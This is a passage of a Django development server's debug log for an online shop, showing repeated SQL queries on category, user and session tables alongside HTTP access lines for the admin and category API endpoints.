'8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 23, 14, 578323, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:23:14,590 utils 11259 139831538779904 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:23:14,627 utils 11259 139831538779904 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-13 12:23:14,638 utils 11259 139831538779904 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:23:14.636197+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 23, 14, 636197, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:23:14] "GET / HTTP/1.0" 200 8892 [13/Dec/2019 12:23:14] "GET /static/admin/img/icon-deletelink.svg HTTP/1.0" 200 392 [13/Dec/2019 12:24:32] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 12:26:04,684 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:26:04,690 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:26:04,694 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:26:04,696 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:26:04,699 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:26:04,702 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:26:04,705 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:26:04,707 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:26:04,710 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:26:04,712 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:26:04,715 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:26:04] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 12:26:17,528 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:26:17,534 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:26:17,537 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:26:17,539 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:26:17,541 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:26:17,544 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:26:17,548 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:26:17,550 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:26:17,553 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:26:17,555 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:26:17,557 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:26:17] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 12:26:17,726 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 12:26:17,730 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 12:26:17] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 12:26:28,249 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:26:28,258 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:26:28,262 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:26:28,266 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:26:28,270 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:26:28,274 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:26:28,277 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:26:28,281 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:26:28,285 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:26:28,294 utils 11259 139831538779904 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:26:28,299 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:26:28] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 12:26:30,837 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:26:30,842 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:26:30,845 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:26:30,848 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:26:30,852 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:26:30,855 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:26:30,860 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:26:30,863 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:26:30,871 utils 11259 139831538779904 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:26:30,873 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:26:30,876 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:26:30] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 12:26:30,879 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:26:30,883 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [13/Dec/2019 12:26:30] "GET /api/v1/categories/6 HTTP/1.0" 200 181 DEBUG 2019-12-13 12:28:22,455 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:28:22.441735+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 28, 22, 441735, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:28:22,459 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:28:22,464 utils 11259 139831317362432 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 12:28:22,465 utils 11259 139831317362432 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 12:28:22,472 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 12:28:22,588 utils 11259 139831317362432 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T12:28:22.585553+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 12, 28, 22, 585553, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 12:28:22] "GET /shop/category/ HTTP/1.0" 200 6758 DEBUG 2019-12-13 12:28:22,899 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:28:22.885761+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 28, 22, 885761, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:28:22,904 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 12:28:22] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 12:28:25,845 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T12:28:25.830826+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 12, 28, 25, 830826, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 12:28:25,849 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 12:28:25,853 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 12:28:25,934 utils 11259 139831317362432 (0.001) DECLARE 